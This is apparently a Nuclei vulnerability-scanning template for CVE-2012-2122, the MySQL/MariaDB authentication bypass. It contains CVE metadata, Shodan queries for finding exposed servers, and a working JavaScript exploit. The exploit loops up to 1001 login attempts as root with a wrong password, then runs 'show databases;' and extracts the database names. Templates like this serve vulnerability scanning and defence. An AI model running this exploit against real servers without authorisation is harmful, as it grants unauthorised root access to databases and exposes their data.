id: CVE-2012-2122 info: name: MySQL - Authentication Bypass author: pussycat0x severity: medium description: | sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value. reference: - https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122 - http://kb.askmonty.org/en/mariadb-5162-release-notes/ - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00007.html - http://security.gentoo.org/glsa/glsa-201308-06.xml - http://securitytracker.com/id?1027143 classification: cvss-metrics: CVSS:2.0/AV:N/AC:H/Au:N/C:P/I:P/A:P cvss-score: 5.1 cve-id: CVE-2012-2122 cwe-id: CWE-287 epss-score: 0.9681 epss-percentile: 0.99685 cpe: cpe:2.3:a:oracle:mysql:5.1.51:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: oracle product: mysql shodan-query: - "product:\"MySQL\"" - product:"mysql" tags: cve,cve2012,js,enum,network,mssql,fuzz,oracle javascript: - pre-condition: | isPortOpen(Host,Port); code: | const mysql = require('nuclei/mysql'); const client = new mysql.MySQLClient; for (let i = 1; i <= 1001; i++) { try { const connected = client.ExecuteQuery(Host, Port, User, Pass, Query); Export(connected); break; } catch { // error } } args: Host: "{{Host}}" Port: 3306 User: "root" Pass: "wrong" Query: "show databases;" matchers: - type: dsl dsl: - "success == true" extractors: - type: json part: response json: - .Rows[] | .Database # digest: 4a0a0047304502207fa11d2a7dbb88837eb0ae592716b8a335a68e751bf3d72680406af18e40e484022100ba836bfec0daf4f5dd1cdfa594c59a8f139e7289c66b9bf49bc0e529a6a9b903:922c64590222798bb761d5b6d8e72950